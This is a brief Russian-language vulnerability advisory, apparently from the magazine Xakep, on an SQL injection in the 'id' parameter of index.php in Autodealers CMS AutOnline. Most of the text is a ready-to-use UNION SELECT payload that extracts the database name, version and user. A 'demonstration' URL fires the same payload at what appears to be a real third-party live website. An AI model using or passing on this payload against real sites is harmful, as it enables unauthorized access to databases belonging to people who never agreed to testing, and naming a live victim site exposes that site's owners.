Хакер #305. Многошаговые SQL-инъекции
Программа: Autodealers CMS AutOnline
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://localhost/script_path/index.php?page=detail&id=[SQL]
[SQL]=ZoRLu'%20union%20select%20null,concat(database(),0x3a,
version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),
null,null,null,null,null/*
Демонстрация:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'
%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),
null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*